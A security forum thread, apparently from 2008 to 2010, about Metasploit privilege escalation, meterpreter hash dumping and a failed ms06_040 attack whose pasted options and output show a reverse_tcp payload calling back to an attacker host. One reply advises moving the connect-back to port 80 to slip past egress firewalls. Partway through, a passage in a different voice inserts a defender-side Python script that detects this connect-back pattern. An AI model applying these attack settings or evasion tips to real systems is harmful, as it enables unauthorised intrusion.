Metasploit Question

SynJunkie

Jr. Member

Posts: 71

Joined: Thu Apr 17, 2008 2:41 pm

Location: UK

Post Thu Nov 13, 2008 6:44 pm

Metasploit Question

Hi guys, I have a question regarding Metasploit. 

I'm happy with the process for running Metasploit against a remote host and with using the msfpayload function of Metasploit but...

Is it possible to create an executable using Metasploit that will exploit a vulnerability on the local machine that is running in the context of a restricted user to raise the privileges of the user or execute any other payload that is specified, such as create an Administrative Account or install a VNC server and connect back to another host?

Maybe I have missed something, but to run a payload that was created with msfpayload it seems to assume that the user/victim already has administrative rights on the target PC.
----------------------------------
http://synjunkie.blogspot.com
LSOChris

Post Fri Nov 14, 2008 4:56 pm

Re: Metasploit Question

SynJunkie wrote:
Hi guys, I have a question regarding Metasploit.

I'm happy with the process for running Metasploit against a remote host and with using the msfpayload function of Metasploit but...

Is it possible to create an executable using Metasploit that will exploit a vulnerability on the local machine that is running in the context of a restricted user to raise the privileges of the user or execute any other payload that is specified, such as create an Administrative Account or install a VNC server and connect back to another host?

No, Metasploit doesn't have local exploits.

SynJunkie wrote:
Maybe I have missed something, but to run a payload that was created with msfpayload it seems to assume that the user/victim already has administrative rights on the target PC.

You can send a reverse shell out running as a regular user, but you'll only get a shell with that user's privs.
pseud0

Recruiters

Posts: 210

Joined: Sat Nov 17, 2007 8:26 pm

Location: Detroit, Michigan

Post Fri Nov 14, 2008 5:16 pm

Re: Metasploit Question

You're referring to privilege escalation on a machine that you already have some level of access to? There are a lot of tools you can use for that, but Metasploit sure wouldn't be my first choice. They plan to build it out in the future to do this via the meterpreter tool, but it still doesn't seem to be the best option. Hell, you could just pick the relevant exploit out of:

http://www.milw0rm.com/local.php
CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
SynJunkie

Jr. Member

Posts: 71

Joined: Thu Apr 17, 2008 2:41 pm

Location: UK

Post Fri Nov 14, 2008 7:33 pm

Re: Metasploit Question

Thanks. I was hoping I could do something with Metasploit, but maybe I'll wait for that.

Cheers

Syn
----------------------------------
http://synjunkie.blogspot.com
ethicalhack3r

Full Member

Posts: 139

Joined: Fri Nov 28, 2008 11:29 am

Post Fri Nov 28, 2008 11:32 am

Re: Metasploit Question

You can use Metasploit's meterpreter payload to either drop the machine's NTLM hashes then crack them, or upload a local exploit and execute it.

I posted about meterpreter recently on my personal blog.

http://www.ethicalhack3r.co.uk
finalversion_2k

Newbie

Posts: 1

Joined: Thu Jan 14, 2010 2:15 am

Post Mon Jan 18, 2010 5:04 am

Re: Metasploit Question

Guys, I need your help in Metasploit, I'm new... I set this configuration, the exploit was completed but the session was not created :'( so can you tell me where I was wrong... Can anyone help me? Thanks in advance...

Module options:

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOST    192.168.1.2      yes      The target address
  RPORT    445              yes      Set the SMB service port
  SMBPIPE  BROWSER          yes      The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread          yes      Exit technique: seh, thread, process
  LHOST    192.168.1.11    yes      The local address
  LPORT    4444            yes      The local port


Exploit target:

  Id  Name
  --  ----
  0  (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)


msf exploit(ms06_040_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Exploit completed, but no session was created.
bamed

Newbie

Posts: 48

Joined: Thu Mar 19, 2009 7:05 pm

Location: Joplin, MO

Post Mon Jan 18, 2010 8:04 am

Re: Metasploit Question

There's nothing necessarily wrong with your settings, assuming of course that you have the IPs and ports right, but those are specific to your environment, and only you can know those.
What you're looking at here basically is that your exploit failed. This could be because the system isn't vulnerable to the exploit you're trying. It also could be a firewall getting in the way. It's possible the remote system has a firewall that's preventing your payload from connecting back to your station.
I'm assuming you're in an environment where you have access to the system you're exploiting, so check to see if there's a firewall running, or any other software that might be protecting the system. Also make sure you're not running a firewall on the local machine.
I'd also double check the exploit you're using. Research it and find out what it's exploiting. Also, was there a patch to fix the vulnerability? If so (and there probably is), has the patch been applied to the system?
BTW, if the problem is firewall/security software related, you might try a different payload, or a different port. For example, there may be a firewall that only allows outgoing traffic on certain ports. Outgoing port 4444 is probably blocked in this circumstance. If the firewall is blocking based on port, then use a port that wouldn't be blocked, like port 80. Just make sure you aren't running a local web server so port 80 is free.
So to recap:
1. Make sure the system is vulnerable and not patched. (FYI, details on the vulnerability can be found at: http://www.microsoft.com/technet/securi ... 6-040.mspx )
2. Check for a firewall on the remote system (on the local system too for that matter)
3. Try a common port that isn't likely to be blocked
4. One more thing, if you really want to see what's happening

Hope this helps.
chown -R bamed ./base
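From the defender's side, the pattern bamed describes (an inbound SMB connection on 445 followed shortly by the victim opening an outbound connection back to the same external host, whether on 4444 or on a "safe" port like 80) is easy to correlate in firewall logs. The following is an added example, not code from the thread or from Metasploit; the log format, addresses and timestamps are constructed for illustration.

```python
# Added example: correlate an inbound SMB (445) connection with a later
# outbound connect-back from the victim to the same remote host. This is a
# defender-side check for the reverse_tcp pattern discussed above; the log
# format and all addresses below are constructed, not taken from a real device.
import re
from datetime import datetime, timedelta

# Constructed format: "<date> <time> <ALLOW|DROP> <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"(?P<ts>\S+ \S+) (?P<action>ALLOW|DROP) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+)"
)

SAMPLE_LOG = """\
2010-01-18 05:03:58 ALLOW 192.168.1.11:1055 -> 192.168.1.2:445
2010-01-18 05:04:01 DROP 192.168.1.2:1043 -> 192.168.1.11:4444
2010-01-18 05:04:05 ALLOW 192.168.1.2:1044 -> 192.168.1.11:80
2010-01-18 05:10:00 ALLOW 192.168.1.2:1050 -> 10.0.0.5:80
"""


def parse_log(text):
    """Parse matching lines into dicts; lines in another format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
        d["sport"], d["dport"] = int(d["sport"]), int(d["dport"])
        events.append(d)
    return events


def find_connect_backs(events, window_seconds=300):
    """Return (victim, remote, dport, action) for every outbound connection a
    host makes back to a remote that reached its port 445 within the window.
    Both DROP and ALLOW are reported: a blocked 4444 attempt is still a signal,
    and an allowed port-80 connect-back is exactly the case egress filtering
    by port alone misses."""
    inbound_smb = {}  # (victim, remote) -> time of the inbound 445 connection
    hits = []
    for e in events:
        if e["dport"] == 445 and e["action"] == "ALLOW":
            inbound_smb[(e["dst"], e["src"])] = e["ts"]
        key = (e["src"], e["dst"])
        if key in inbound_smb and e["ts"] - inbound_smb[key] <= timedelta(seconds=window_seconds):
            hits.append((e["src"], e["dst"], e["dport"], e["action"]))
    return hits


if __name__ == "__main__":
    for hit in find_connect_backs(parse_log(SAMPLE_LOG)):
        print("connect-back after inbound SMB:", hit)
```

Correlating on the remote host rather than on the destination port is the point: changing LPORT from 4444 to 80 defeats a port-based egress rule but not this check.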
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Jan 18, 2010 9:26 pm

Re: Metasploit Question

ethicalhack3r wrote:
You can use Metasploit's meterpreter payload to either drop the machine's NTLM hashes then crack them, or upload a local exploit and execute it.

I posted about meterpreter recently on my personal blog.

http://www.ethicalhack3r.co.uk

Dumping the hash will not work because it requires administrator rights.
jonas

Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Wed Jan 20, 2010 3:52 pm

Re: Metasploit Question

I think maybe you're wrong about that. If I remember correctly, I dumped the hash with meterpreter's hashdump only having user privs.
That was after I was unsuccessful with pwdump through a cmd shell.
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Jan 22, 2010 3:27 pm

Re: Metasploit Question

jonas, unless you managed to run it as a scheduled task which runs with system privileges, you won't be able to dump the hash.
timmedin

Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Jan 31, 2010 9:52 pm

Re: Metasploit Question

d3l0n wrote:
jonas, unless you managed to run it as a scheduled task which runs with system privileges, you won't be able to dump the hash.

d3l0n is right, you have to have admin or system level privileges in order to dump the hashes.
twitter.com/timmedin | http://blog.securitywhole.com
jonas

Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Tue Feb 02, 2010 4:17 pm

Re: Metasploit Question

Obviously didn't remember correctly.... hehe.
Well, local exploits and it's all solved anyway, I guess =)
